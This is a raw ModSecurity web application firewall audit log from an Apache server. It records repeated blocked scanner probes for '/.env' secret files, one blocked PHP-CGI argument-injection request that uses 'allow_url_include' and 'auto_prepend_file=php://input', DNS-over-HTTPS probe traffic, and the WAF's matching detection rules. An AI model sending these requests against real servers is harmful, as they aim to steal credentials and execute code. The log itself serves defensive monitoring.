User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 Accept-Charset: utf-8 --a19fab66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a19fab66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745965506076471 811 (- - -) Stopwatch2: 1745965506076471 811; combined=338, p1=298, p2=0, p3=0, p4=0, p5=39, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a19fab66-Z-- --0bce174f-A-- [30/Apr/2025:06:57:49 +0700] aBFnfT1td-6YjlnYDRKAEwAAAAE 103.236.140.4 33142 103.236.140.4 8181 --0bce174f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Android; Mobile; rv:35.0) Gecko/35.0 Firefox/35.0 Accept-Charset: utf-8 --0bce174f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bce174f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745971069223888 807 (- - -) Stopwatch2: 1745971069223888 807; combined=307, p1=270, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bce174f-Z-- --76372507-A-- [30/Apr/2025:06:59:37 +0700] aBFn6dmPDA_SdVd56wDv5QAAAM8 103.236.140.4 33564 103.236.140.4 8181 --76372507-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; NCE-AL00 Build/HUAWEINCE-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6904 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 --76372507-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76372507-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745971177484070 13479 (- - -) Stopwatch2: 1745971177484070 13479; combined=25487, p1=351, p2=0, p3=0, p4=0, p5=12586, sr=120, sw=0, l=0, gc=12550 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76372507-Z-- --c9280108-A-- [30/Apr/2025:07:03:35 +0700] aBFo1zsHLQ2TK6eM3eo9rAAAAIE 103.236.140.4 34512 103.236.140.4 8181 --c9280108-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116 Accept-Charset: utf-8 --c9280108-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9280108-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745971415013816 754 (- - -) Stopwatch2: 1745971415013816 754; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9280108-Z-- --1072295b-A-- [30/Apr/2025:07:06:12 +0700] aBFpdDsHLQ2TK6eM3eo9zQAAAJA 103.236.140.4 35124 103.236.140.4 8181 --1072295b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.84 Safari/537.36 Accept-Charset: utf-8 --1072295b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1072295b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745971572043227 799 (- - -) Stopwatch2: 1745971572043227 799; combined=364, p1=326, p2=0, p3=0, p4=0, p5=38, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1072295b-Z-- --d9ed2059-A-- [30/Apr/2025:07:06:35 +0700] aBFpizsHLQ2TK6eM3eo9zwAAAI8 103.236.140.4 35214 103.236.140.4 8181 --d9ed2059-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 152.70.44.251 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 152.70.44.251 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --d9ed2059-C-- --d9ed2059-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9ed2059-E-- --d9ed2059-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745971595422577 4822 (- - -) Stopwatch2: 1745971595422577 4822; combined=3090, p1=502, p2=2554, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9ed2059-Z-- --2069bf69-A-- [30/Apr/2025:07:43:06 +0700] aBFyGtmPDA_SdVd56wDzGQAAAMk 103.236.140.4 43926 103.236.140.4 8181 --2069bf69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 92.204.144.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 92.204.144.151 X-Forwarded-Proto: https Connection: close Accept: */* --2069bf69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2069bf69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745973786809253 740 (- - -) Stopwatch2: 1745973786809253 740; combined=286, p1=248, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2069bf69-Z-- --8e595e61-A-- [30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQSAAAABU 103.236.140.4 36704 103.236.140.4 8181 --8e595e61-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --8e595e61-C-- Óexamplecom --8e595e61-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e595e61-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109175845 3026 (- - -) Stopwatch2: 1745980109175845 3026; combined=2053, p1=484, p2=1487, p3=23, p4=29, p5=30, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e595e61-Z-- --a026cc69-A-- [30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQSwAAABc 103.236.140.4 36710 103.236.140.4 8181 --a026cc69-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --a026cc69-C-- ègexamplecom --a026cc69-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a026cc69-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109230583 2757 (- - -) Stopwatch2: 1745980109230583 2757; combined=1870, p1=430, p2=1373, p3=20, p4=22, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a026cc69-Z-- --0c22a274-A-- [30/Apr/2025:09:28:29 +0700] aBGKzTsHLQ2TK6eM3epLCAAAAJY 103.236.140.4 36720 103.236.140.4 8181 --0c22a274-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --0c22a274-C-- x—examplecom --0c22a274-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c22a274-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109284745 3439 (- - -) Stopwatch2: 1745980109284745 3439; combined=2268, p1=500, p2=1687, p3=23, p4=28, p5=29, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c22a274-Z-- --47a1e844-A-- [30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQTgAAABQ 103.236.140.4 36726 103.236.140.4 8181 --47a1e844-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --47a1e844-C-- ’fexamplecom --47a1e844-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --47a1e844-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109339285 2894 (- - -) Stopwatch2: 1745980109339285 2894; combined=2059, p1=400, p2=1592, p3=20, p4=22, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47a1e844-Z-- --17eaa379-A-- [30/Apr/2025:09:28:29 +0700] aBGKzdBN0baiHx4WjiZpUAAAAEs 103.236.140.4 36744 103.236.140.4 8181 --17eaa379-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --17eaa379-C-- Ï&examplecom --17eaa379-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --17eaa379-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109608873 3760 (- - -) Stopwatch2: 1745980109608873 3760; combined=2651, p1=554, p2=1996, p3=28, p4=33, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17eaa379-Z-- --51825134-A-- [30/Apr/2025:09:28:29 +0700] aBGKzdBN0baiHx4WjiZpUwAAAFE 103.236.140.4 36754 103.236.140.4 8181 --51825134-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --51825134-C-- Texamplecom --51825134-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --51825134-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109668016 3497 (- - -) Stopwatch2: 1745980109668016 3497; combined=2338, p1=527, p2=1729, p3=27, p4=29, p5=26, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51825134-Z-- --dd40077d-A-- [30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQUgAAAAQ 103.236.140.4 36760 103.236.140.4 8181 --dd40077d-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --dd40077d-C-- ¸àexamplecom --dd40077d-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --dd40077d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109739613 3215 (- - -) Stopwatch2: 1745980109739613 3215; combined=1951, p1=416, p2=1458, p3=27, p4=24, p5=25, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd40077d-Z-- --9713c11e-A-- [30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQVAAAAAs 103.236.140.4 36770 103.236.140.4 8181 --9713c11e-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.245.117.221 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.245.117.221 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --9713c11e-C-- óëexamplecom --9713c11e-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --9713c11e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745980109794636 3300 (- - -) Stopwatch2: 1745980109794636 3300; combined=1984, p1=420, p2=1476, p3=26, p4=24, p5=37, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9713c11e-Z-- --2e462749-A-- [30/Apr/2025:10:58:33 +0700] aBGf6dmPDA_SdVd56wAqHAAAAMw 103.236.140.4 60506 103.236.140.4 8181 --2e462749-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.132.8 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --2e462749-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e462749-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745985513501033 821 (- - -) Stopwatch2: 1745985513501033 821; combined=341, p1=302, p2=0, p3=0, p4=0, p5=39, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e462749-Z-- --2d37455b-A-- [30/Apr/2025:11:24:17 +0700] aBGl8TsHLQ2TK6eM3epy6QAAAII 103.236.140.4 43358 103.236.140.4 8181 --2d37455b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.203.63 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.203.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --2d37455b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d37455b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745987057115266 738 (- - -) Stopwatch2: 1745987057115266 738; combined=299, p1=265, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d37455b-Z-- --f0a2b24e-A-- [30/Apr/2025:12:23:44 +0700] aBGz4NmPDA_SdVd56wAw1wAAANI 103.236.140.4 57338 103.236.140.4 8181 --f0a2b24e-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 207.154.197.113 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f0a2b24e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0a2b24e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745990624862716 769 (- - -) Stopwatch2: 1745990624862716 769; combined=299, p1=256, p2=0, p3=0, p4=0, p5=43, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0a2b24e-Z-- --7a585321-A-- [30/Apr/2025:13:19:12 +0700] aBHA4NBN0baiHx4WjiacMAAAAFQ 103.236.140.4 45506 103.236.140.4 8181 --7a585321-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --7a585321-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a585321-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745993952866305 915 (- - -) Stopwatch2: 1745993952866305 915; combined=408, p1=367, p2=0, p3=0, p4=0, p5=41, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a585321-Z-- --b3df0b7b-A-- [30/Apr/2025:13:33:28 +0700] aBHEODsHLQ2TK6eM3ep56wAAAIE 103.236.140.4 48862 103.236.140.4 8181 --b3df0b7b-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.143.102 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.143.102 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --b3df0b7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3df0b7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] 